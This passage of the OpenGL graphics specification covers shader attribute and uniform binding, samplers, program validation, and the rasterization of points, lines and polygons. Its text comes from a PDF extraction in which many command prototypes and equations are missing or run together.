error INVALID VALUE is generated if index is equal orgreater than MAX VERTEX ATTRIBS. BindAttribLocation has no effect until theprogram is linked. In particular, it doesn’t modify the bindings of active attributevariables in a program that has already been linked. Built-in attribute variables are automatically bound to conventional attributes,and can not have an assigned binding. The error INVALID OPERATION is gener-ated if name starts with the reserved "gl " prefix. When a program is linked, any active attributes without a binding specifiedthrough BindAttribLocation will be automatically be bound to vertex attributesby the GL. Such bindings can be queried using the command GetAttribLocation.LinkProgram will fail if the assigned binding of an active attribute variable wouldcause the GL to reference a non-existant generic attribute (one greater than or equalto MAX VERTEX ATTRIBS). LinkProgram will fail if the attribute bindings as-signed by BindAttribLocation do not leave not enough space to assign a locationfor an active matrix attribute, which requires multiple contiguous generic attributes.LinkProgram will also fail if the vertex shaders used in the program object containassignments (not removed during pre-processing) to an attribute variable bound togeneric attribute zero and to the conventional vertex position (gl Vertex). BindAttribLocation may be issued before any vertex shader objects are at-tached to a program object. Hence it is allowed to bind any name (except a namestarting with "gl ") to an index, including a name that is never used as an attributein any vertex shader object. Assigned bindings for attribute variables that do notexist or are not active are ignored. The values of generic attributes sent to generic attribute index i are part ofcurrent state, just like the conventional attributes. If a new program object hasbeen made active, then these values will be tracked by the GL in such a way thatthe same values will be observed by attributes in the new program object that arealso bound to index i. It is possible for an application to bind more than one attribute name to thesame location. This is referred to as aliasing. This will only work if only one ofthe aliased attributes is active in the executable program, or if no path through theshader consumes more than one attribute of a set of attributes aliased to the samelocation. A link error can occur if the linker determines that every path through theshader consumes multiple aliased attributes, but implementations are not requiredto generate an error in this case. The compiler and linker are allowed to assume thatno aliasing is done, and may employ optimizations that work only in the absenceof aliasing. It is not possible to alias generic attributes with conventional ones. Uniform VariablesShaders can declare named uniform variables, as described in the OpenGL ShadingLanguage Specification. Values for these uniforms are constant over a primitive,and typically they are constant across many primitives. Uniforms are programobject-specific state. They retain their values once loaded, and their values arerestored whenever a program object is used, as long as the program object has notbeen re-linked. A uniform is considered active if it is determined by the compilerand linker that the uniform will actually be accessed when the executable codeis executed. In cases where the compiler and linker cannot make a conclusivedetermination, the uniform will be considered active. The amount of storage available for uniform variables accessed bya vertex shader is specified by the implementation dependent constantMAX VERTEX UNIFORM COMPONENTS. This value represents the number of indi-vidual floating-point, integer, or boolean values that can be held in uniform variablestorage for a vertex shader. A link error will be generated if an attempt is made toutilize more than the space available for vertex shader uniform variables. When a program is successfully linked, all active uniforms belonging to theprogram object are initialized to zero (FALSE for booleans). A successful link willalso generate a location for each active uniform. The values of active uniforms canbe changed using this location and the appropriate Uniform* command (see be-low). These locations are invalidated and new ones assigned after each successfulre-link. To find the location of an active uniform variable within a program object, usethe command This command will return the location of uniform variable name. name must be anull terminated string, without white space. The value -1 will be returned if name does not correspond to an active uniform variable name in program or if name startswith the reserved prefix "gl ". If program has not been successfully linked, theerror INVALID OPERATION is generated. After a program is linked, the locationof a uniform variable will not change, unless the program is re-linked. A valid name cannot be a structure, an array of structures, or any portion ofa single vector or a matrix. In order to identify a valid name, the "." (dot) and"[]" operators can be used in name to specify a member of a structure or elementof an array. The first element of a uniform array is identified using the name of the uniformarray appended with "[0]". Except if the last part of the string name indicates auniform array, then the location of the first element of that array can be retrievedby either using the name of the uniform array, or the name of the uniform arrayappended with "[0]". To determine the set of active uniform attributes used by a program, and todetermine their sizes and types, use the command: This command provides information about the uniform selected by index. An in-dex of 0 selects the first active uniform, and an index of ACTIVE UNIFORMS − 1selects the last active uniform. The value of ACTIVE UNIFORMS can be queriedwith GetProgramiv (see section 6.1.14). If index is greater than or equal toACTIVE UNIFORMS, the error INVALID VALUE is generated. Note that index sim-ply identifies a member in a list of active uniforms, and has no relation to thelocation assigned to the corresponding uniform variable. The parameter program is a name of a program object for which the commandLinkProgram has been issued in the past. It is not necessary for program to havebeen linked successfully. The link could have failed because the number of activeuniforms exceeded the limit. If an error occurred, the return parameters length, size, type and name will beunmodified. For the selected uniform, the uniform name is returned into name. The stringname will be null terminated. The actual number of characters written into name,excluding the null terminator, is returned in length. If length is NULL, no length isreturned. The maximum number of characters that may be written into name, in-cluding the null terminator, is specified by bufSize. The returned uniform namecan be the name of built-in uniform state as well. The complete list of built-in uniform state is described in section 7.5 of the OpenGL Shading Language The Uniform*i{v} commands will load count sets of one to four integer val-ues into a uniform location defined as a sampler, an integer, an integer vector, anarray of samplers, an array of integers, or an array of integer vectors. Only theUniform1i{v} commands can be used to load sampler values (see below). The UniformMatrix{234}fv commands will load count 2 × 2, 3 × 3, or 4 × 4matrices (corresponding to 2, 3, or 4 in the command name) of floating-point valuesinto a uniform location defined as a matrix or an array of matrices. If transposeis FALSE, the matrix is specified in column major order, otherwise in row majororder. The UniformMatrix{2x3,3x2,2x4,4x2,3x4,4x3}fv commands will load count2×3, 3×2, 2×4, 4×2, 3×4, or 4×3 matrices (corresponding to the numbers in thecommand name) of floating-point values into a uniform location defined as a matrixor an array of matrices. The first number in the command name is the number ofcolumns; the second is the number of rows. For example, UniformMatrix2x4fvis used to load a matrix consisting of two columns and four rows. If transposeis FALSE, the matrix is specified in column major order, otherwise in row majororder. When loading values for a uniform declared as a boolean, a boolean vector,an array of booleans, or an array of boolean vectors, both the Uniform*i{v} andUniform*f{v} set of commands can be used to load boolean values. Type con-version is done by the GL. The uniform is set to FALSE if the input value is 0 or0.0f, and set to TRUE otherwise. The Uniform* command used must match thesize of the uniform, as declared in the shader. For example, to load a uniformdeclared as a bvec2, either Uniform2i{v} or Uniform2f{v} can be used. AnINVALID OPERATION error will be generated if an attempt is made to use a non-matching Uniform* command. In this example using Uniform1iv would generatean error. For all other uniform types the Uniform* command used must match the sizeand type of the uniform, as declared in the shader. No type conversions are done.For example, to load a uniform declared as a vec4, Uniform4f{v} must be used.To load a 3x3 matrix, UniformMatrix3fv must be used. An INVALID OPERATIONerror will be generated if an attempt is made to use a non-matching Uniform*command. In this example, using Uniform4i{v} would generate an error. When loading N elements starting at an arbitrary position k in a uniform de-clared as an array, elements k through k + N − 1 in the array will be replacedwith the new values. Values for any array element that exceeds the highest arrayelement index used, as reported by GetActiveUniform, will be ignored by the GL. If the value of location is -1, the Uniform* commands will silently ignore thedata passed in, and the current uniform values will not be changed. If any of the following conditions occur, an INVALID OPERATION error is gen- • if the size indicated in the name of the Uniform* command used does not match the size of the uniform declared in the shader, • if the uniform declared in the shader is not of type boolean and the type indicated in the name of the Uniform* command used does not match the type of the uniform, • if count is greater than one, and the uniform declared in the shader is not an array variable, SamplersSamplers are special uniforms used in the OpenGL Shading Language to identifythe texture object used for each texture lookup. The value of a sampler indicatesthe texture image unit being accessed. Setting a sampler’s value to i selects textureimage unit number i. The values of i range from zero to the implementation-dependent maximum supported number of texture image units. The type of the sampler identifies the target on the texture image unit. Thetexture object bound to that texture image unit’s target is then used for the texturelookup. For example, a variable of type sampler2D selects target TEXTURE 2D onits texture image unit. Binding of texture objects to targets is done as usual withBindTexture. Selecting the texture image unit to bind to is done as usual withActiveTexture. The location of a sampler needs to be queried with GetUniformLocation, justlike any uniform variable. Sampler values need to be set by calling Uniform1i{v}.Loading samplers with any of the other Uniform* entry points is not allowed andwill result in an INVALID OPERATION error. It is not allowed to have variables of different sampler types pointing to thesame texture image unit within a program object. This situation can only be de-tected at the next rendering command issued, and an INVALID OPERATION errorwill then be generated. Active samplers are samplers actually being used in a program object. TheLinkProgram command determines if a sampler is active or not. The LinkPro-gram command will attempt to determine if the active samplers in the shader(s) contained in the program object exceed the maximum allowable limits. If it de-termines that the count of active samplers exceeds the allowable limits, then thelink fails (these limits can be different for different types of shaders). Each activesampler variable counts against the limit, even if multiple samplers refer to thesame texture image unit. If this cannot be determined at link time, for example ifthe program object only contains a vertex shader, then it will be determined at thenext rendering command issued, and an INVALID OPERATION error will then begenerated. Varying VariablesA vertex shader may define one or more varying variables (see the OpenGL Shad-ing Language specification). These values are expected to be interpolated acrossthe primitive being rendered. The OpenGL Shading Language specification definesa set of built-in varying variables for vertex shaders that correspond to the valuesrequired for the fixed-function processing that occurs after vertex processing. The number of interpolators available for processing varying variables is givenby the implementation-dependent constant MAX VARYING FLOATS. This value rep-resents the number of individual floating-point values that can be interpolated;varying variables declared as vectors, matrices, and arrays will all consume multi-ple interpolators. When a program is linked, all components of any varying vari-able written by a vertex shader, or read by a fragment shader, will count againstthis limit. The transformed vertex position (gl Position) is not a varying vari-able and does not count against this limit. A program whose shaders access morethan MAX VARYING FLOATS components worth of varying variables may fail tolink, unless device-dependent optimizations are able to make the program fit withinavailable hardware resources. • All of the above applies when setting the current raster position (sec- tion 2.13). The following operations are applied to vertex values that are the result ofexecuting the vertex shader: • Color, texture coordinate, fog, point-size and generic attribute clipping (sec- tion 2.14.8). There are several special considerations for vertex shader execution describedin the following sections. Texture AccessVertex shaders have the ability to do a lookup into a texture map, if sup-ported by the GL implementation. The maximum number of texture image unitsavailable to a vertex shader is MAX VERTEX TEXTURE IMAGE UNITS; a maxi-mum number of zero indicates that the GL implemenation does not supporttexture accesses in vertex shaders. The maximum number of texture imageunits available to the fragment stage of the GL is MAX TEXTURE IMAGE UNITS. Both the vertex shader and fragment processing combined cannot use morethan MAX COMBINED TEXTURE IMAGE UNITS texture image units. If boththe vertex shader and the fragment processing stage access the same textureimage unit, then that counts as using two texture image units against theMAX COMBINED TEXTURE IMAGE UNITS limit. When a texture lookup is performed in a vertex shader, the filtered texture valueτ is computed in the manner described in sections 3.8.8 and 3.8.9, and convertedit to a texture source color Cs according to table 3.20 (section 3.8.13). A four-component vector (Rs , Gs , Bs , As ) is returned to the vertex shader. In a vertex shader, it is not possible to perform automatic level-of-detail calcu-lations using partial derivatives of the texture coordinates with respect to windowcoordinates as described in section 3.8.8. Hence, there is no automatic selection ofan image array level. Minification or magnification of a texture map is controlledby a level-of-detail value optionally passed as an argument in the texture lookupfunctions. If the texture lookup function supplies an explicit level-of-detail value l,then the pre-bias level-of-detail value λbase (x, y) = l (replacing equation 3.18). Ifthe texture lookup function does not supply an explicit level-of-detail value, thenλbase (x, y) = 0. The scale factor ρ(x, y) and its approximation function f (x, y)(see equation 3.21) are ignored. Texture lookups involving textures with depth component data can either re-turn the depth data directly or return the results of a comparison with the r tex-ture coordinate used to perform the lookup, as described in section 3.8.14. Thecomparison operation is requested in the shader by using the shadow samplertypes (sampler1DShadow or sampler2DShadow) and in the texture using theTEXTURE COMPARE MODE parameter. These requests must be consistent; the re-sults of a texture lookup are undefined if: • The sampler used in a texture lookup function is of type sampler1D or sampler2D, and the texture object’s internal format is DEPTH COMPONENT, and the TEXTURE COMPARE MODE is not NONE. • The sampler used in a texture lookup function is of type sampler1DShadow or sampler2DShadow, and the texture object’s internal format is DEPTH COMPONENT, and the TEXTURE COMPARE MODE is NONE. If a vertex shader uses a sampler where the associated texture object is not com-plete, as defined in section 3.8.10, the texture image unit will return (R, G, B, A)= (0, 0, 0, 1). Position InvarianceIf a vertex shader uses the built-in function ftransform to generate a vertex posi-tion, then this generally guarantees that the transformed position will be the samewhether using this vertex shader or the fixed-function pipeline. This allows for cor-rect multi-pass rendering algorithms, where some passes use fixed-function vertextransformation and other passes use a vertex shader. If a vertex shader does not useftransform to generate a position, transformed positions are not guaranteed tomatch, even if the sequence of instructions used to compute the position match thesequence of transformations described in section 2.11. ValidationIt is not always possible to determine at link time if a program object actuallywill execute. Therefore validation is done when the first rendering command isissued, to determine if the currently active program object can be executed. Ifit cannot be executed then no fragments will be rendered, and Begin, Raster-Pos, or any command that performs an implicit Begin will generate the errorINVALID OPERATION. This error is generated by Begin, RasterPos, or any command that performsan implicit Begin if: • any two active samplers in the current program object are of different types, but refer to the same texture image unit, • any active sampler in the current program object refers to a texture image unit where fixed-function fragment processing accesses a texture target that does not match the sampler type, or • the sum of the number of active samplers in the program and the number of texture image units enabled for fixed-function fragment processing exceeds the combined limit on the total number of texture image units allowed. to validate the program object program against the current GL state. Each programobject has a boolean status, VALIDATE STATUS, that is modified as a result ofvalidation. This status can be queried with GetProgramiv (see section 6.1.14).If validation succeeded this status will be set to TRUE, otherwise it will be set toFALSE. If validation succeeded the program object is guaranteed to execute, giventhe current GL state. If validation failed, the program object is guaranteed to notexecute, given the current GL state. ValidateProgram will check for all the conditions that could lead to anINVALID OPERATION error when rendering commands are issued, and may checkfor other conditions as well. For example, it could give a hint on how to optimizesome piece of shader code. The information log of program is overwritten withinformation on the results of the validation, which could be an empty string. Theresults written to the information log are typically only useful during applicationdevelopment; an application should not expect different GL implementations toproduce identical information. A shader should not fail to compile, and a program object should not fail tolink due to lack of instruction space or lack of temporary variables. Implementa-tions should ensure that all valid shaders and program objects may be successfullycompiled, linked and executed. Undefined BehaviorWhen using array or matrix variables in a shader, it is possible to access a vari-able with an index computed at run time that is outside the declared extent of thevariable. Such out-of-bounds reads will return undefined values; out-of-boundswrites will have undefined results and could corrupt other variables used by shaderor the GL. The level of protection provided against such errors in the shader isimplementation-dependent. Rasterization 90 91 FRAGMENT_PROGRAM enable Point Rasterization From Line Primitive Rasterization Assembly Fragment Texturing Program Polygon Rasterization Color Sum Pixel DrawPixels Rectangle Rasterization Several factors affect rasterization. Lines and polygons may be stippled. Pointsmay be given differing diameters and line segments differing widths. A point, linesegment, or polygon may be antialiased. 3.1 InvarianceConsider a primitive p0 obtained by translating a primitive p through an offset (x, y)in window coordinates, where x and y are integers. As long as neither p0 nor p isclipped, it must be the case that each fragment f 0 produced from p0 is identical toa corresponding fragment f from p except that the center of f 0 is offset by (x, y)from the center of f . 3.2 AntialiasingAntialiasing of a point, line, or polygon is effected in one of two ways dependingon whether the GL is in RGBA or color index mode. In RGBA mode, the R, G, and B values of the rasterized fragment are leftunaffected, but the A value is multiplied by a floating-point value in the range[0, 1] that describes a fragment’s screen pixel coverage. The per-fragment stage ofthe GL can be set up to use the A value to blend the incoming fragment with thecorresponding pixel already present in the framebuffer. In color index mode, the least significant b bits (to the left of the binary point)of the color index are used for antialiasing; b = min{4, m}, where m is the numberof bits in the color index portion of the framebuffer. The antialiasing process setsthese b bits based on the fragment’s coverage value: the bits are set to zero for nocoverage and to all ones for complete coverage. The details of how antialiased fragment coverage values are computed are dif-ficult to specify in general. The reason is that high-quality antialiasing may takeinto account perceptual issues as well as characteristics of the monitor on whichthe contents of the framebuffer are displayed. Such details cannot be addressedwithin the scope of this document. Further, the coverage value computed for afragment of some primitive may depend on the primitive’s relationship to a num-ber of grid squares neighboring the one corresponding to the fragment, and not juston the fragment’s grid square. Another consideration is that accurate calculationof coverage values may be computationally expensive; consequently we allow agiven GL implementation to approximate true coverage values by using a fast butnot entirely accurate coverage computation. In light of these considerations, we chose to specify the behavior of exact an-tialiasing in the prototypical case that each displayed pixel is a perfect square of uniform intensity. The square is called a fragment square and has lower left corner(x, y) and upper right corner (x+1, y +1). We recognize that this simple box filtermay not produce the most favorable antialiasing results, but it provides a simple,well-defined model. A GL implementation may use other methods to perform antialiasing, subjectto the following conditions: 1. If f1 and f2 are two fragments, and the portion of f1 covered by some prim- itive is a subset of the corresponding portion of f2 covered by the primitive, then the coverage computed for f1 must be less than or equal to that com- puted for f2 . 3. The sum of the coverage values for all fragments produced by rasterizing a particular primitive must be constant, independent of any rigid motions in window coordinates, as long as none of those fragments lies along window edges. 3.2.1 MultisamplingMultisampling is a mechanism to antialias all GL primitives: points, lines, poly-gons, bitmaps, and images. The technique is to sample all primitives multiple timesat each pixel. The color sample values are resolved to a single, displayable coloreach time a pixel is updated, so the antialiasing appears to be automatic at theapplication level. Because each sample includes color, depth, and stencil informa-tion, the color (including texture operation), depth, and stencil functions performequivalently to the single-sample mode. An additional buffer, called the multisample buffer, is added to the framebuffer.Pixel sample values, including color, depth, and stencil values, are stored in thisbuffer. Samples contain separate color values for each fragment color. Whenthe framebuffer includes a multisample buffer, it does not include depth or sten-cil buffers, even if the multisample buffer does not store depth or stencil values. Color buffers (left, right, front, back, and aux) do coexist with the multisamplebuffer, however. Multisample antialiasing is most valuable for rendering polygons, because itrequires no sorting for hidden surface elimination, and it correctly handles adjacentpolygons, object silhouettes, and even intersecting polygons. If only points orlines are being rendered, the “smooth” antialiasing mechanism provided by thebase GL may result in a higher quality image. This mechanism is designed toallow multisample and smooth antialiasing techniques to be alternated during therendering of a single scene. If the value of SAMPLE BUFFERS is one, the rasterization of all primi-tives is changed, and is referred to as multisample rasterization. Otherwise,primitive rasterization is referred to as single-sample rasterization. The valueof SAMPLE BUFFERS is queried by calling GetIntegerv with pname set toSAMPLE BUFFERS. During multisample rendering the contents of a pixel fragment are changedin two ways. First, each fragment includes a coverage value with SAMPLES bits.The value of SAMPLES is an implementation-dependent constant, and is queried bycalling GetIntegerv with pname set to SAMPLES. Second, each fragment includes SAMPLES depth values, color values, and setsof texture coordinates, instead of the single depth value, color value, and set oftexture coordinates that is maintained in single-sample rendering mode. An imple-mentation may choose to assign the same color value and the same set of texturecoordinates to more than one sample. The location for evaluating the color valueand the set of texture coordinates can be anywhere within the pixel including thefragment center or any of the sample locations. The color value and the set of tex-ture coordinates need not be evaluated at the same location. Each pixel fragmentthus consists of integer x and y grid coordinates, SAMPLES color and depth values,SAMPLES sets of texture coordinates, and a coverage value with a maximum ofSAMPLES bits. Multisample rasterization is enabled or disabled by calling Enable or Disablewith the symbolic constant MULTISAMPLE. If MULTISAMPLE is disabled, multisample rasterization of all primitives isequivalent to single-sample (fragment-center) rasterization, except that the frag-ment coverage value is set to full coverage. The color and depth values and thesets of texture coordinates may all be set to the values that would have been as-signed by single-sample rasterization, or they may be assigned as described belowfor multisample rasterization. If MULTISAMPLE is enabled, multisample rasterization of all primitives differssubstantially from single-sample rasterization. It is understood that each pixel inthe framebuffer has SAMPLES locations associated with it. These locations are exact positions, rather than regions or areas, and each is referred to as a samplepoint. The sample points associated with a pixel may be located inside or outsideof the unit square that is considered to bound the pixel. Furthermore, the relativelocations of sample points may be identical for each pixel in the framebuffer, orthey may differ. If the sample locations differ per pixel, they should be aligned to window, notscreen, boundaries. Otherwise rendering results will be window-position specific.The invariance requirement described in section 3.1 is relaxed for all multisamplerasterization, because the sample locations may be a function of pixel location. It is not possible to query the actual sample locations of a pixel. 3.3 PointsIf a vertex shader is not active, then the rasterization of points is controlled with size specifies the requested size of a point. The default value is 1.0. A value lessthan or equal to zero results in the error INVALID VALUE. The requested point size is multiplied with a distance attenuation factor,clamped to a specified point size range, and further clamped to the implementation-dependent point size range to produce the derived point size: s ! 1 derived size = clamp size ∗ a + b ∗ d + c ∗ d2 where d is the eye-coordinate distance from the eye, (0, 0, 0, 1) in eye coordinates,to the vertex, and a, b, and c are distance attenuation function coefficients. If multisampling is not enabled, the derived size is passed on to rasterization asthe point width. If a vertex shader is active and vertex program point size mode is enabled,then the derived point size is taken from the (potentially clipped) shader builtingl PointSize and clamped to the implementation-dependent point size range. Ifthe value written to gl PointSize is less than or equal to zero, results are unde-fined. If a vertex shader is active and vertex program point size mode is disabled,then the derived point size is taken from the point size state as specified by thePointSize command. In this case no distance attenuation is performed. Vertex pro-gram point size mode is enabled and disabled by calling Enable or Disable withthe symbolic value VERTEX PROGRAM POINT SIZE. The distance attenuation function coefficients a, b, and c, the bounds of the firstpoint size range clamp, and the point fade threshold, are specified with void PointParameter{if}( enum pname, T param ); void PointParameter{if}v( enum pname, const T params ); If pname is POINT SIZE MIN or POINT SIZE MAX, then param speci-fies, or params points to the lower or upper bound respectively to whichthe derived point size is clamped. If the lower bound is greater thanthe upper bound, the point size after clamping is undefined. If pname isPOINT DISTANCE ATTENUATION, then params points to the coefficients a, b,and c. If pname is POINT FADE THRESHOLD SIZE, then param specifies,or params points to the point fade threshold. Values of POINT SIZE MIN,POINT SIZE MAX, or POINT FADE THRESHOLD SIZE less than zero result in theerror INVALID VALUE. Point antialiasing is enabled or disabled by calling Enable or Disable with thesymbolic constant POINT SMOOTH. The default state is for point antialiasing to bedisabled. Point sprites are enabled or disabled by calling Enable or Disable with thesymbolic constant POINT SPRITE. The default state is for point sprites to be dis-abled. When point sprites are enabled, the state of the point antialiasing enable isignored. The point sprite texture coordinate replacement mode is set with one of the Tex-Env* commands described in section 3.8.13, where target is POINT SPRITE andpname is COORD REPLACE. The possible values for param are FALSE and TRUE.The default value for each texture coordinate set is for point sprite texture coordi-nate replacement to be disabled. The point sprite texture coordinate origin is set with the PointParame-ter* commands where pname is POINT SPRITE COORD ORIGIN and param isLOWER LEFT or UPPER LEFT. The default value is UPPER LEFT. 5.5 4.5 3.5 2.5 1.5 0.5 0.5 1.5 2.5 3.5 4.5 5.5 0.5 1.5 2.5 3.5 4.5 5.5 Figure 3.2. Rasterization of non-antialiased wide points. The crosses show fragment centers produced by rasterization for any point that lies within the shaded region. The dotted grid lines lie on half-integer coordinates. 6.0 5.0 4.0 3.0 2.0 1.0 0.0 0.0 1.0 2.0 3.0 4.0 5.0 6.0 corre- sponding fragment square. Solid lines lie on integer coordinates. 1 1 + (yf + 2 −yw ) , POINT SPRITE COORD ORIGIN = LOWER LEFT t= 2 size 1 (yf + 21 −yw ) 2 − size , POINT SPRITE COORD ORIGIN = UPPER LEFT (3.4)where size is the point’s size, xf and yf are the (integral) window coordinates of the fragment, and xw and yw are the exact, unrounded window coordinates of thevertex for the point. The widths supported for point sprites must be a superset of those supportedfor antialiased points. There is no requirement that these widths must be equallyspaced. If an unsupported width is requested, the nearest supported width is usedinstead. 2. The total number of fragments produced by the algorithm may differ from that produced by the diamond-exit rule by no more than one. 3. For an x-major line, no two fragments may be produced that lie in the same window-coordinate column (for a y-major line, no two fragments may ap- pear in the same row). 4. If two line segments share a common endpoint, and both segments are either x-major (both left-to-right or both right-to-left) or y-major (both bottom-to- top or both top-to-bottom), then rasterizing both segments may not produce duplicate fragments, nor may any fragments be omitted so as to interrupt continuity of the connected segments. Next we must specify how the data associated with each rasterized fragmentare obtained. Let the window coordinates of a produced fragment center be givenby pr = (xd , yd ) and let pa = (xa , ya ) and pb = (xb , yb ). Set (pr − pa ) · (pb − pa ) t= . (3.5) kpb − pa k2(Note that t = 0 at pa and t = 1 at pb .) The value of an associated datum f forthe fragment, whether it be primary or secondary R, G, B, or A (in RGBA mode)or a color index (in color index mode), the fog coordinate, an s, t, r, or q texturecoordinate, or the clip w coordinate, is found as Line StippleThe command defines a line stipple. pattern is an unsigned short integer. The line stipple is takenfrom the lowest order 16 bits of pattern. It determines those fragments that areto be drawn when the line is rasterized. factor is a count that is used to modifythe effective line stipple by causing each bit in line stipple to be used factor times.f actor is clamped to the range [1, 256]. Line stippling may be enabled or disabledusing Enable or Disable with the constant LINE STIPPLE. When disabled, it is asif the line stipple has its default value. Line stippling masks certain fragments that are produced by rasterization sothat they are not sent to the per-fragment stage of the GL. The masking is achieved using three parameters: the 16-bit line stipple p, the line repeat count r, and aninteger stipple counter s. Let Then a fragment is produced if the bth bit of p is 1, and not produced otherwise.The bits of p are numbered with 0 being the least significant and 15 being themost significant. The initial value of s is zero; s is incremented after productionof each fragment of a line segment (fragments are produced in order, beginning atthe starting point and working towards the ending point). s is reset to 0 whenevera Begin occurs, and before every line segment in a group of independent segments(as specified when Begin is invoked with LINES). If the line segment has been clipped, then the value of s at the beginning of theline segment is indeterminate. Wide LinesThe actual width of non-antialiased lines is determined by rounding the suppliedwidth to the nearest integer, then clamping it to the implementation-dependentmaximum non-antialiased line width. This implementation-dependent value mustbe no less than the implementation-dependent maximum antialiased line width,rounded to the nearest integer value, and in any event no less than 1. If roundingthe specified width results in the value 0, then it is as if the value were 1. Non-antialiased line segments of width other than one are rasterized by off-setting them in the minor direction (for an x-major line, the minor direction isy, and for a y-major line, the minor direction is x) and replicating fragments inthe minor direction (see figure 3.5). Let w be the width rounded to the nearestinteger (if w = 0, then it is as if w = 1). If the line segment has endpointsgiven by (x0 , y0 ) and (x1 , y1 ) in window coordinates, the segment with endpoints(x0 , y0 − (w − 1)/2) and (x1 , y1 − (w − 1)/2) is rasterized, but instead of a singlefragment, a column of fragments of height w (a row of fragments of length w fora y-major segment) is produced at each x (y for y-major) location. The lowestfragment of this column is the fragment that would be produced by rasterizing thesegment of width 1 with the modified coordinates. The whole column is not pro-duced if the stipple bit for the column’s x location is zero; otherwise, the wholecolumn is produced. AntialiasingRasterized antialiased line segments produce fragments whose fragment squaresintersect a rectangle centered on the line segment. Two of the edges are parallel to width = 2 width = 3 Figure 3.5. Rasterization of non-antialiased wide lines. x-major line segments are shown. The heavy line segment is the one specified to be rasterized; the light seg- ment is the offset segment used for rasterization. x marks indicate the fragment centers produced by rasterization. the specified line segment; each is at a distance of one-half the current width fromthat segment: one above the segment and one below it. The other two edges passthrough the line endpoints and are perpendicular to the direction of the specifiedline segment. Coverage values are computed for each fragment by computing thearea of the intersection of the rectangle with the fragment square (see figure 3.6;see also section 3.2). Equation 3.6 is used to compute associated data values just aswith non-antialiased lines; equation 3.5 is used to find the value of t for each frag-ment whose square is intersected by the line segment’s rectangle. Not all widthsneed be supported for line segment antialiasing, but width 1.0 antialiased segmentsmust be provided. As with the point width, a GL implementation may be queriedfor the range and number of gradations of available antialiased line widths. For purposes of antialiasing, a stippled line is considered to be a sequence ofcontiguous rectangles centered on the line segment. Each rectangle has width equalto the current line width and length equal to 1 pixel (except the last, which may beshorter). These rectangles are numbered from 0 to n, starting with the rectangleincident on the starting endpoint of the segment. Each of these rectangles is ei-ther eliminated or produced according to the procedure given under Line Stipple,above, where “fragment” is replaced with “rectangle.” Each rectangle so produced Figure 3.6. The region used in rasterizing and finding corresponding coverage val- ues for an antialiased line segment (an x-major line segment is shown). 3.5 PolygonsA polygon results from a polygon Begin/End object, a triangle resulting from atriangle strip, triangle fan, or series of separate triangles, or a quadrilateral arisingfrom a quadrilateral strip, series of separate quadrilaterals, or a Rect command.Like points and line segments, polygon rasterization is controlled by several vari-ables. Polygon antialiasing is controlled with Enable and Disable with the sym-bolic constant POLYGON SMOOTH. The analog to line segment stippling for poly-gons is polygon stippling, described below. mode is a symbolic constant: one of FRONT, BACK or FRONT AND BACK. Cullingis enabled or disabled with Enable or Disable using the symbolic constantCULL FACE. Front facing polygons are rasterized if either culling is disabled or the CullFace mode is BACK while back facing polygons are rasterized only if ei-ther culling is disabled or the CullFace mode is FRONT. The initial setting of theCullFace mode is BACK. Initially, culling is disabled. The rule for determining which fragments are produced by polygon rasteriza-tion is called point sampling. The two-dimensional projection obtained by takingthe x and y window coordinates of the polygon’s vertices is formed. Fragmentcenters that lie inside of this polygon are produced by rasterization. Special treat-ment is given to a fragment whose center lies on a polygon boundary edge. Insuch a case we require that if two polygons lie on either side of a common edge(with identical endpoints) on which a fragment center lies, then exactly one of thepolygons results in the production of the fragment during rasterization. As for the data associated with each fragment produced by rasterizing a poly-gon, we begin by specifying how these values are produced for fragments in atriangle. Define barycentric coordinates for a triangle. Barycentric coordinates area set of three numbers, a, b, and c, each in the range [0, 1], with a + b + c = 1.These coordinates uniquely specify any point p within the triangle or on the trian-gle’s boundary as p = apa + bpb + cpc ,where pa , pb , and pc are the vertices of the triangle. a, b, and c can be found as where A(lmn) denotes the area in window coordinates of the triangle with verticesl, m, and n. Denote an associated datum at pa , pb , or pc as fa , fb , or fc , respectively. Thenthe value f of a datum at a fragment produced by rasterizing a triangle is given by For a polygon with more than three edges, we require only that a convex com-bination of the values of the datum at the polygon’s vertices can be used to obtainthe value assigned to each fragment produced by the rasterization algorithm. Thatis, it must be the case that at every fragment n X f= ai fi i=1 where n is the number of vertices in the polygon, fi is the value of the f at vertexi; for each i 0 ≤ ai ≤ 1 and ni=1 ai = 1. The values of the ai may differ from P 3.5.2 StipplingPolygon stippling works much the same way as line stippling, masking out certainfragments produced by rasterization so that they are not sent to the next stage ofthe GL. This is the case regardless of the state of polygon antialiasing. Stippling iscontrolled with 3.5.3 Antialiasing face is one of FRONT, BACK, or FRONT AND BACK, indicating that the rasterizingmethod described by mode replaces the rasterizing method for front facing poly-gons, back facing polygons, or both front and back facing polygons, respectively.mode is one of the symbolic constants POINT, LINE, or FILL. Calling Polygon-Mode with POINT causes certain vertices of a polygon to be treated, for rasteriza-tion purposes, just as if they were enclosed within a Begin(POINT) and End pair.The vertices selected for this treatment are those that have been tagged as having apolygon boundary edge beginning on them (see section 2.6.2). LINE causes edgesthat are tagged as boundary to be rasterized as line segments. (The line stipplecounter is reset at the beginning of the first rasterized edge of the polygon, butnot for subsequent edges.) FILL is the default mode of polygon rasterization, cor-responding to the description in sections 3.5.1, 3.5.2, and 3.5.3. Note that thesemodes affect only the final rasterization of polygons: in particular, a polygon’s ver-tices are lit, and the polygon is clipped and possibly culled before these modes areapplied. Polygon antialiasing applies only to the FILL state of PolygonMode. ForPOINT or LINE, point antialiasing or line segment antialiasing, respectively, ap-ply. factor scales the maximum depth slope of the polygon, and units scales an im-plementation dependent constant that relates to the usable resolution of the depthbuffer. The resulting values are summed to produce the polygon offset value. Bothfactor and units may be either positive or negative. The maximum depth slope m of a triangle is s 2 2 ∂zw ∂zw m= + (3.9) ∂xw ∂ywwhere (xw , yw , zw ) is a point on the triangle. m may be approximated as ∂zw ∂zw m = max , . (3.10) ∂xw ∂yw If the polygon has more than three vertices, one or more values of m may be usedduring rasterization. Each may take any value in the range [min,max], where minand max are the smallest and largest values obtained by evaluating equation 3.9 orequation 3.10 for the triangles formed by all three-vertex combinations. The minimum resolvable difference r is an implementation constant. It is thesmallest difference in window coordinate z values that is guaranteed to remaindistinct throughout polygon rasterization and in the depth buffer. All pairs of frag-ments generated by the rasterization of two polygons with otherwise identical ver-tices, but zw values that differ by r, will have distinct depth values. The offset value o for a polygon is FILL for both front and back facing polygons. The initial polygon offset factorand bias values are both 0; initially polygon offset is disabled for all modes. In addition to storing pixel data in client memory, pixel data may alsobe stored in buffer objects (described in section 2.9). The current pixel un-pack and pack buffer objects are designated by the PIXEL UNPACK BUFFER andPIXEL 